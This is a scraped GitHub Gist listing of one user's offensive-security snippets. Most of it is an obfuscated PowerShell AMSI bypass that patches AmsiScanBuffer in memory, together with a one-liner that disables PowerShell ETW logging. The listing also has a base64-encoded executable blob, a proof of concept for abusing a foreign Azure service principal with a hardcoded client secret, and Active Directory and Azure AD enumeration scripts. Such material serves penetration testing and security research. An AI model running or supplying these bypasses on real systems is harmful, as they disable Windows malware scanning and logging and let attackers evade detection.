Skip to content

Instantly share code, notes, and snippets.

$teststring = "AMSI Test Sample: " + "7e72c3ce-861b-4339-8740-0ac1484c1386"
Invoke-Expression $teststring
@m8r1us
m8r1us / AMSI
Created December 10, 2024 13:03
$data = @"
usi-ng Syst-em;usi-ng Syst-em.R-untime.Int-eropS-ervices;us-ing Syst-em.Thr-ead-ing;pub-lic c-lass Pr-ogram{- [D-llIm-port("ker-ne-l3-2")] pub-l-ic static e-x-tern IntPtr GetP-ro-cA-ddr-ess(IntPtr hMo-du-le, str-in-g proc-Na-me); [D-llIm-port("ke-rne-l3-2")] pub-l-ic static e-x-tern IntPtr Lo-ad-Li-brary(str-in-g na-me); [D-llIm-port("ke-rn-el32")] pub-l-ic static e-x-tern bo-ol V-irtualPr-ot-ect(IntPtr lpAd-dr-ess, U-In-t32 dw-S-ize, uint flN-ew-Pr-ot-ect, out uint lpflO-ld-Pr-ot-ect); pub-lic stat-ic void Ru-n() { Int-Ptr li-b = Lo-a-dLi-b-rary("a"+"m"+"si."+"d"+"l"+"l"); IntPt-r am-s-i = GetPr-o-cAddr-e-ss(lib, "A"+"m"+"s"+"iSc"+"anB"+"u-ff-e-r"); In-tPtr fi-nal = IntPtr.Ad-d(a-m-si, 0x9-5); uint old = 0; Vi-r-t-ua-lPr-o-t-ec-t(fi-nal, (UIn-t3-2)0x1, 0x4-0, out old); C-o-nso-l-e.Wr-i-teLi-n-e(old); byt-e[] pat-ch = new by-te[] { 0x75 }; M-a-rsh-a-l.Co-p-y(pat-ch, 0, final, 1); Vi-rt-ua-lPr-o-t-ec-t(fi-nal, (UIn-t32)0x1, o-ld, ou-t ol-d); }}
"@
Add-Type $data.Replace('-
[System.Diagnostics.Eventing.EventProvider]."G`etField"(-join([char[]](109,95,101,110,97,98,108,101,100)),-join([char[]](78,111,110,80,117,98,108,105,99,44,73,110,115,116,97,110,99,101)))."S`etValue"([Ref].Assembly."G`etType"(-join([char[]](83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,84,114,97,99,105,110,103,46,80,83,69,116,119,76,111,103,80,114,111,118,105,100,101,114)))."G`etField"(-join([char[]](101,116,119,80,114,111,118,105,100,101,114)),-join([char[]](78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99)))."G`etValue"($null),0)
UEsDBBQAAAAIANVbIlDSrchvJ0wCAGihBwAYAAAATWFnbmV0UHJvY2Vzc0NhcHR1cmUuZXhl1Ft9YBzFdZ/bu9s73UmyTiff6fvWH5LXdydZ/pYMtmVjKMbf3w4G27J8NrIlrbwnYYyQLDDEYGwHKOTDUAJuSFJK0rSYQIFQU1ya0kBdmjrF2NSlhFBCG0ITmpJE6ntvZnfnPmTTlH+qoJ03v5n33m/ezLyZXTnLrr2HuRljHvgdGWHsGcZ/Wtmlf4bgtzj2bDE7UfDquGdcS18dt/aGjrTWYxo7zbYurb2tu9vo1balNLOvW+vo1hatWKN1GdtTjUVFgYnCxsorGVvqcrPCSPFmy+4FNp4FXSsZe9/L2JddhA37VMY0EDQokR3KCueNP1bJLvgI73rbB0XrHYyV0H9OaRf08wTYXYEC2L3lAZfTcLuP3VAD5UkfK4TiOuhXzf4XPxpjfqnqh/rVUr2xN3VTL5Se97x8LDhWhWX8ALy10Uyb7SATNxz7F6H8wJvRrxX+azRTnQZ0RK7ImWzd5svut5Bl/VzAuDLOTWFe9kjCy55/kzGMBMRUXbuOsSVn7Ohe8qdSB8dq/Fq9gbGA3ogPoKQqxhQQ45v1JiiUYRWcqumpIBvTED+rRPRmbIEmLza1oOIcRCL6ZVhE9ct5MZeD81DtKkUvht5GFB76fERqFb0Vy9fSC6AYglF40gtRwqWSvgIlN0qLUPKgdCVK4NMTbxzE7sZVqN84iArG73EZVYyruYxKxmIuo5pxDcqr3cMRGFOVsQFq7uGxKCOZjdg4S3Hrn8MBKYKim9RP44zrmsA8WG5TlH6YMw/2TAygxOvx+9xcaKx0J4PmzxnrSV8LCjcryi3UHywmwKJqWxxvkTAHN0H9MKzFqoYAekkMIUBo/OXBAtAu06+DSrLWbHGxntN+y4ZxPTzSmzE+2Iu6xisHA1jUKkNUDurjIfZmFyhSg7EFx4mD7S1A76L93jztsCxc8fvSOs7dVqGgDAVxTjZanYaKuDO9
@m8r1us
m8r1us / PassTheCert.cs
Created April 18, 2024 12:34
modified PassTheCert.cs
// Copyright 2022 Almond (almond.consulting)
//
// Author: Yannick Méheut (ymeheut@almond.consulting)
//
// Accompanying blog post: https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
@m8r1us
m8r1us / consentIsTheMindkiller.ps1
Last active April 8, 2024 14:12
Foreign service principal POC
# The script is part of the following article: https://www.scip.ch/en/?labs.20240404
$myTenantId = "cdfdd915-c827-..." # The tenant registering the foreign application (Source: My Tenant)
$foreignTenantId = "d2a16643-37f9-4a19-..." # The tenant who is hosting the application (Source: Foreign Tenant)
$spPassword = "5YB8Q~iFPkt7WXYbqZkzi42BqpPgVJCWR-assd1" # The client secret from the app (Source: Foreign Tenant)
$appName = "foreignApp" # The app name (Source: Foreign Tenant)
# --------------
#Step 0 (Foreign Tenant): Create an application in the portal
# --------------
@m8r1us
m8r1us / checkForForeignServicePrincipals.ps1
Last active October 5, 2024 17:26
Find foreign service principals
# The script is part of the following article: https://www.scip.ch/en/?labs.20240404
# --------------
# Find foreign service principals with application permissions
# --------------
Write-Host "[*] Log in with a user that has at least the Application.Read.All right `n" -ForegroundColor Green
Connect-MgGraph -scopes "Application.Read.All" -NoWelcome
Write-Host "[*] Output the connection context `n" -ForegroundColor Green
$mgcontext = Get-MgContext
@m8r1us
m8r1us / Groupmembers.ps1
Last active March 27, 2024 14:54
Azure AD group members
# Install and import the AzureAD module (if not already installed)
#Install-Module AzureAD -Force
#Import-Module AzureAD
# Connect to Azure AD
Connect-AzureAD
# Get all Azure AD groups
$AllGroups = Get-AzureADGroup -All $true
@m8r1us
m8r1us / acl.ps1
Created March 14, 2024 15:41
ACl check
function Get-EffectiveAccess {
[CmdletBinding()]
param(
[Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)]
[ValidatePattern('(?:(CN=([^,]*)),)?(?:((?:(?:CN|OU)=[^,]+,?)+),)?((?:DC=[^,]+,?)+)$')]
[alias('DistinguishedName')]
[string] $Identity,
@m8r1us
m8r1us / adeleg-v2.exe.txt
Last active March 12, 2024 16:17
adeleg.exe.txt
This file has been truncated, but you can view the full file.
begin-base64 644 -
Li9hZGVsZWctdjIuemlwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDY2NiAAMDAwMDAw
IAAwMDAwMDAgADAwMDEzMzMzMDAyIDE0NTc0MDc3NTU2IDAxMTcxMAAgMAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhcgAwMAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwMDAwMDAgADAwMDAw
MCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQ